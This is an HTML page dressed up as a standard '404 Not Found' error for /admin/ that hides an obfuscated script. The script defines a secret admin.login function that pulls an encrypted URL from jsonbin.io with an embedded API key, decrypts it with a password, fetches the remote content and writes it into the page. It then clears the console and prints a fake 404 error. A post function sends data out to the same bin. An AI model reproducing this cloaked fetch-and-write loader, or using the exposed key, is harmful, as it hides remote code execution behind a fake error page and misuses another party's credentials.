<html lang="en"><head><meta charset="utf-8">
    <meta name="viewport" content="initial-scale=1, minimum-scale=1, width=device-width">
    <meta http-equiv="Permissions-Policy" content="interest-cohort=()">
    <title>404</title>
    <link rel="icon" href="https://damsea.github.io/img/4.jpg">
     <script src="https://damsea.github.io/import.js"></script>
    <script>
        script(ajax)
        script(aes)
    </script>
    <style>
        
  *{
    margin:0;
    padding:0
}
html,code{
    font:15px/22px arial,sans-serif
}
html{
    background:#fff;
    color:#222;
    padding:15px;
    background-color: #f7f7f7;
}
body{
  
    margin:7% auto 0;
    max-width:390px;
    min-height:180px;
    padding:30px 0 15px;
    
    
}

p{
    margin:11px 0 22px;
    overflow:hidden
}
ins{
    color:#777;
    text-decoration:none
}

@media screen and (max-width:772px){
    body{
        background:none;
        margin-top:0;
        max-width:none;
        padding-right:0
    }
}

img{
    width:100px;
   margin-top:100px;
}

    </style>
    </head>
    <body>
        <a href="https://instagram.com/geazytwo">
            <span id="logo" >
                  <img id="img" src="https://damsea.github.io/img/4.jpg" alt="">
        </span>
    </a>
    <p>
        <b>404.</b>
         <ins>That’s an error.</ins>
    </p>
    <p>The requested URL <code style="color:red;font-family:arial;">/admin/</code> was not found on this server.  <ins>That’s all we know.</ins>
   
    </p>
</body>
 <script>
    if(window.innerWidth > 772){
        document.getElementById('img').src='https://damsea.github.io/img/dev.png';
    }

   (function(_0x2516b4,_0x5cedc4){const _0x64747e=_0x3e2f,_0x54f34b=_0x2516b4();while(!![]){try{const _0x54d875=-parseInt(_0x64747e(0x1c7))/0x1*(parseInt(_0x64747e(0x1cc))/0x2)+parseInt(_0x64747e(0x1c0))/0x3+parseInt(_0x64747e(0x1cd))/0x4+parseInt(_0x64747e(0x1c6))/0x5*(parseInt(_0x64747e(0x1c4))/0x6)+parseInt(_0x64747e(0x1c9))/0x7+parseInt(_0x64747e(0x1c3))/0x8*(-parseInt(_0x64747e(0x1c5))/0x9)+parseInt(_0x64747e(0x1ce))/0xa;if(_0x54d875===_0x5cedc4)break;else _0x54f34b['push'](_0x54f34b['shift']());}catch(_0x348c77){_0x54f34b['push'](_0x54f34b['shift']());}}}(_0x12fb,0xab637));function _0x12fb(){const _0xdc2f4c=['write','get','14566QrOrCM','147724oCdjXT','1873320IFUPru','url','then','676119pUTzPT','$2b$10$1O.PoWna8zg/AryJziD/Au2tUX8Q6dqIq8/Nr/rIo2Num3tLJ1SW.','https://api.jsonbin.io/v3/b/640ab216ace6f33a22ec439d','16888xrRfGG','2405694iHHdNS','4527KYmcaQ','15mNZcoB','107fbTtmC','clear','6234466oFLLtf'];_0x12fb=function(){return _0xdc2f4c;};return _0x12fb();}function _0x3e2f(_0x4b88d1,_0x2091a5){const _0x12fb9b=_0x12fb();return _0x3e2f=function(_0x3e2f97,_0x5f5a1b){_0x3e2f97=_0x3e2f97-0x1c0;let _0x57b9a5=_0x12fb9b[_0x3e2f97];return _0x57b9a5;},_0x3e2f(_0x4b88d1,_0x2091a5);}const admin={'login':_0x8fe088=>{const _0xa2adb5=_0x3e2f;$ajax[_0xa2adb5(0x1cb)]({'url':'https://api.jsonbin.io/v3/b/640ab216ace6f33a22ec439d','key':'$2b$10$1O.PoWna8zg/AryJziD/Au2tUX8Q6dqIq8/Nr/rIo2Num3tLJ1SW.'},_0xa3ded9=>{const _0x372d24=_0xa2adb5;var _0x172ac6=_0xa3ded9['record'][_0x372d24(0x1cf)];fetch(decrypt(_0x172ac6,_0x8fe088))[_0x372d24(0x1d0)](_0x50df6a=>_0x50df6a['text']())[_0x372d24(0x1d0)](_0x35a636=>document[_0x372d24(0x1ca)](_0x35a636)),console[_0x372d24(0x1c8)]();});}};function post(_0x3a97da){const _0x980b32=_0x3e2f;$ajax['post']({'url':_0x980b32(0x1c2),'key':_0x980b32(0x1c1),'data':_0x3a97da});}
    console.error('Failed to load resource: the server responded with a status of 404 ()')
 </script>
</html>
